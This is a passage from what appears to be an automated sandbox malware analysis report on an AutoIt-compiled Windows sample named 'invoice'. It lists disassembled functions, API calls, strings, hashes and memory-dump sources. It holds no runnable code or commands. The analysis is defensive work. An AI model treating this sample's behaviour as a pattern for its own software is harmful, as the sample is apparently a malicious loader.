                        • Instruction Fuzzy Hash: 02E02632D108026B9230E738EC0D9EA779CAE45335F10470AFD75C20C0EB78AD10A7D6
                        Function 00F8E800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                        Download Yara Rule
                        Strings
                        • Variable must be of type 'Object'., xrefs: 00FC41BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: Variable must be of type 'Object'.
                        • API String ID: 0-109567571
                        • Opcode ID: 2c23cebb6537821367f2ac4e73457b163e52c0620a0f69db70f93d02d2437bfd
                        • Instruction ID: 0f8f3465c8f9468405e128c145659c8dc82e2b7baa549099c7ca78962c9a8b99
                        • Opcode Fuzzy Hash: 2c23cebb6537821367f2ac4e73457b163e52c0620a0f69db70f93d02d2437bfd
                        • Instruction Fuzzy Hash: FCA28A75E00205CFCB24EF58C981AEAB7B1FB59310F248069E946AB351D775EC46EB90
                        Function 00F90B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90BBB
                        • timeGetTime.WINMM ref: 00F90E76
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F90FB3
                        • Sleep.KERNEL32(0000000A), ref: 00F90FC1
                        • LockWindowUpdate.USER32(00000000,?,?), ref: 00F9105A
                        • DestroyWindow.USER32 ref: 00F91066
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F91080
                        • Sleep.KERNEL32(0000000A,?,?), ref: 00FC51DC
                        • TranslateMessage.USER32(?), ref: 00FC5FB9
                        • DispatchMessageW.USER32(?), ref: 00FC5FC7
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FC5FDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                        • API String ID: 4212290369-3242690629
                        • Opcode ID: 18b951fc499832bff3e2c8b3f46800c073732475dd8ae6acc3581e42dd4377d4
                        • Instruction ID: 441b1559f64c963291ca193bc614da622b44a4563bd619c259d9730415a42dad
                        • Opcode Fuzzy Hash: 18b951fc499832bff3e2c8b3f46800c073732475dd8ae6acc3581e42dd4377d4
                        • Instruction Fuzzy Hash: F1B20570A08742DFDB24DF24C985FAAB7E5FF84714F14491DE48987291CB79E884EB82
                        Function 00FE91FE Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FE9008: __time64.LIBCMT ref: 00FE9012
                          • Part of subcall function 00F85045: _fseek.LIBCMT ref: 00F8505D
                        • __wsplitpath.LIBCMT ref: 00FE92DD
                          • Part of subcall function 00FA426E: __wsplitpath_helper.LIBCMT ref: 00FA42AE
                        • _wcscpy.LIBCMT ref: 00FE92F0
                        • _wcscat.LIBCMT ref: 00FE9303
                        • __wsplitpath.LIBCMT ref: 00FE9328
                        • _wcscat.LIBCMT ref: 00FE933E
                        • _wcscat.LIBCMT ref: 00FE9351
                          • Part of subcall function 00FE904E: _memmove.LIBCMT ref: 00FE9087
                          • Part of subcall function 00FE904E: _memmove.LIBCMT ref: 00FE9096
                        • _wcscmp.LIBCMT ref: 00FE9298
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98CD
                          • Part of subcall function 00FE97DD: _wcscmp.LIBCMT ref: 00FE98E0
                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FE94FB
                        • _wcsncpy.LIBCMT ref: 00FE956E
                        • DeleteFileW.KERNEL32(?,?), ref: 00FE95A4
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FE95BA
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE95CB
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FE95DD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                        • String ID:
                        • API String ID: 1500180987-0
                        • Opcode ID: ab8126da846de6bac11c5f6601d4bd8b835108777293db7638ab1e890c7c934b
                        • Instruction ID: c51d9e0e56feded3649cb9394bca82d09f64089352926a6627316dd5b5722831
                        • Opcode Fuzzy Hash: ab8126da846de6bac11c5f6601d4bd8b835108777293db7638ab1e890c7c934b
                        • Instruction Fuzzy Hash: 4FC15BB1E04219AFCF21EF95CC85ADEB7BDEF45310F0040AAF609E6141EB749A449F65
                        Function 00F83023 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                        • RegisterClassExW.USER32(00000030), ref: 00F8309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                        • LoadIconW.USER32(000000A9), ref: 00F830F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 46e9b4f1e66b703c1cbb4ccaa1a5228f6933bd7958900047d7cd57358098a773
                        • Instruction ID: 19a025ccece19aba0bc153c371f1d62766479a7b467474723e1cc88c519ff8b1
                        • Opcode Fuzzy Hash: 46e9b4f1e66b703c1cbb4ccaa1a5228f6933bd7958900047d7cd57358098a773
                        • Instruction Fuzzy Hash: 2D3108B594130AAFEB61CFA4D984ACDBBF4FB09710F10411EE5C0E6294D7BA0585DF51
                        Function 00F83041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00F83074
                        • RegisterClassExW.USER32(00000030), ref: 00F8309E
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                        • InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                        • LoadIconW.USER32(000000A9), ref: 00F830F2
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 9c245e5bf9d2dcc8e85d573eaeff51fccdccd026f318fc50ed43770a7f11f7e7
                        • Instruction ID: 6d177253427832c3a9c82a9df880f000d24cdd19a2710622a817d77203c05fac
                        • Opcode Fuzzy Hash: 9c245e5bf9d2dcc8e85d573eaeff51fccdccd026f318fc50ed43770a7f11f7e7
                        • Instruction Fuzzy Hash: A521F4B5900209AFEB21DFA4E988BDDBBF4FB08700F00411AF990E6284DBBA45449F91
                        Function 00F871EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F84864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010452F8,?,00F837C0,?), ref: 00F84882
                          • Part of subcall function 00FA068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F872C5), ref: 00FA06AD
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F87308
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FBEC21
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FBEC62
                        • RegCloseKey.ADVAPI32(?), ref: 00FBECA0
                        • _wcscat.LIBCMT ref: 00FBECF9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 2673923337-2727554177
                        • Opcode ID: 3c4f742a9562d1f65b619952e40ed646ae9e0608bcb62535aa9e503ca153f2cb
                        • Instruction ID: a4f58f5473d2f25ad735d6ca8edc5fe6fd8e3d240c5730674818885d74fb6373
                        • Opcode Fuzzy Hash: 3c4f742a9562d1f65b619952e40ed646ae9e0608bcb62535aa9e503ca153f2cb
                        • Instruction Fuzzy Hash: 0971AFB1508701AFC324EF65DA819DBBBE8FF8A710F40042EF48483164EB3AD948EB51
                        Function 00F83A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                        Download Yara Rule
                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00F83A62
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F83A71
                        • LoadIconW.USER32(00000063), ref: 00F83A88
                        • LoadIconW.USER32(000000A4), ref: 00F83A9A
                        • LoadIconW.USER32(000000A2), ref: 00F83AAC
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F83AD2
                        • RegisterClassExW.USER32(?), ref: 00F83B28
                          • Part of subcall function 00F83041: GetSysColorBrush.USER32(0000000F), ref: 00F83074
                          • Part of subcall function 00F83041: RegisterClassExW.USER32(00000030), ref: 00F8309E
                          • Part of subcall function 00F83041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F830AF
                          • Part of subcall function 00F83041: InitCommonControlsEx.COMCTL32(?), ref: 00F830CC
                          • Part of subcall function 00F83041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F830DC
                          • Part of subcall function 00F83041: LoadIconW.USER32(000000A9), ref: 00F830F2
                          • Part of subcall function 00F83041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F83101
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: b79aa2638b8e84c87663f4adbdf0b86dffa8edbf6ad5806ab1c077a4a2eb5f96
                        • Instruction ID: 6597404cfa133f34fd66c9b866e6f1d9a6afe2b6cb3a7e195ff3199f90330cce
                        • Opcode Fuzzy Hash: b79aa2638b8e84c87663f4adbdf0b86dffa8edbf6ad5806ab1c077a4a2eb5f96
                        • Instruction Fuzzy Hash: DD215EB5D00305AFEB31DFA4EE89B9D7BB4FB09711F00011AF584A6295D3BA56409F85
                        Function 00F83633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                        Download Yara Rule
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 00F836D2
                        • KillTimer.USER32(?,00000001), ref: 00F836FC
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F8371F
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F8372A
                        • CreatePopupMenu.USER32 ref: 00F8373E
                        • PostQuitMessage.USER32(00000000), ref: 00F8375F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: a7823f79306d78cdc3f5fef05b7857a1d191c8e7cd901c53f25bbf5423b78349
                        • Instruction ID: 7e4b363abc7cb57ad95c5301d4921e54a79c3b4652e1887408db8c3903d5c28a
                        • Opcode Fuzzy Hash: a7823f79306d78cdc3f5fef05b7857a1d191c8e7cd901c53f25bbf5423b78349
                        • Instruction Fuzzy Hash: 674135F2604106BBEB307B68DD89BFD3755FB01710F100529F982D62A5EA6ADE00B762
                        Function 00F83778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                        • API String ID: 1825951767-3513169116
                        • Opcode ID: 275ee873bdb583a40404461e2e787417361eaa533c53167a83557cab416db07b
                        • Instruction ID: 2657a82454d20f41f0c62e0efb01fa181b1a0028f3ceedf5c31bc703335bfafe
                        • Opcode Fuzzy Hash: 275ee873bdb583a40404461e2e787417361eaa533c53167a83557cab416db07b
                        • Instruction Fuzzy Hash: 2CA18172D042199BDB14FBA1CC82AEEB778BF15700F44001AF452B7191EF789A09EB60
                        Function 0152DBC8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0152DC99
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0152DEBF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                        • Instruction ID: 1fe5ea03e94caeb27d63f552a84e5c46c08d7a6cd53e57a822c30d50a6ace356
                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                        • Instruction Fuzzy Hash: 93A1F575E00219EBEB14CFE8C898BEEBBB5BF49305F208559E601BB2C1D7759A40CB54
                        Function 00F839E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                        Download Yara Rule
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F83A15
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83A36
                        • ShowWindow.USER32(00000000,?,?), ref: 00F83A4A
                        • ShowWindow.USER32(00000000,?,?), ref: 00F83A53
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: b6b7c543ffa09ae8ca7450d492b73fe3d3b3d46b94277c58a0a221eaab5f4dbb
                        • Instruction ID: 5bd38f53492a47773de34f6b4925980dc1a3b4d8755652d85f4680c53f47f0d1
                        • Opcode Fuzzy Hash: b6b7c543ffa09ae8ca7450d492b73fe3d3b3d46b94277c58a0a221eaab5f4dbb
                        • Instruction Fuzzy Hash: E5F03AB45402907FEA325627AE88E2B3E7DE7CBF50F00001EB984E2194C26A0C40DBB0
                        Function 0152D9A8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0152D898: Sleep.KERNELBASE(000001F4), ref: 0152D8A9
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0152DABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: PTD12EEZSXSP5K9UR
                        • API String ID: 2694422964-2959788194
                        • Opcode ID: d0a921cdf87e23140abf5a56a19faaca876e453bf6ae7576b2251426bb8afa0e
                        • Instruction ID: bb05d6f605bb80a35f2b9c7d774765010d5945412a8ceb134273d34a7225e2b0
                        • Opcode Fuzzy Hash: d0a921cdf87e23140abf5a56a19faaca876e453bf6ae7576b2251426bb8afa0e
                        • Instruction Fuzzy Hash: 59517D31D04259DBEF11DBE4C814BEFBBB8AF19301F004199E608BB2C1D6B94B48CBA1
                        Function 00F8410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FBD51C
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • _memset.LIBCMT ref: 00F8418D
                        • _wcscpy.LIBCMT ref: 00F841E1
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F841F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                        • String ID: Line:
                        • API String ID: 3942752672-1585850449
                        • Opcode ID: b0033d8d89bc8bbd53c72703787e70eefb85603dbf83d8c23b30c1b1e0788a77
                        • Instruction ID: 1d85d48ad20f038b25e0c5d5f7f83316c3e83f004fd38deded09371f9432c4b7
                        • Opcode Fuzzy Hash: b0033d8d89bc8bbd53c72703787e70eefb85603dbf83d8c23b30c1b1e0788a77
                        • Instruction Fuzzy Hash: 9731C1B15083056BD732FB60DD86BDB77E8AF45310F20461EF1C492091EB78A648EB92
                        Function 00F869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F84F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84F6F
                        • _free.LIBCMT ref: 00FBE5BC
                        • _free.LIBCMT ref: 00FBE603
                          • Part of subcall function 00F86BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F86D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _free$CurrentDirectoryLibraryLoad
                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                        • API String ID: 2861923089-1757145024
                        • Opcode ID: 65e8cbd7af6f7c0839e1c82382df378ffe110d2163c0e12db3d66b9d1c762482
                        • Instruction ID: feb74b0b5a73c46afe5f79d1036b6dfa5e85696a399f2557aa49aba0a793cb6a
                        • Opcode Fuzzy Hash: 65e8cbd7af6f7c0839e1c82382df378ffe110d2163c0e12db3d66b9d1c762482
                        • Instruction Fuzzy Hash: 18914A71910219EFCF14EFA5CC919EDB7B4FF09314B14446AF816AB291EB38A905EF60
                        Function 00F835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00F835A1,SwapMouseButtons,00000004,?), ref: 00F835D4
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F835F5
                        • RegCloseKey.KERNELBASE(00000000,?,?,00F835A1,SwapMouseButtons,00000004,?,?,?,?,00F82754), ref: 00F83617
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
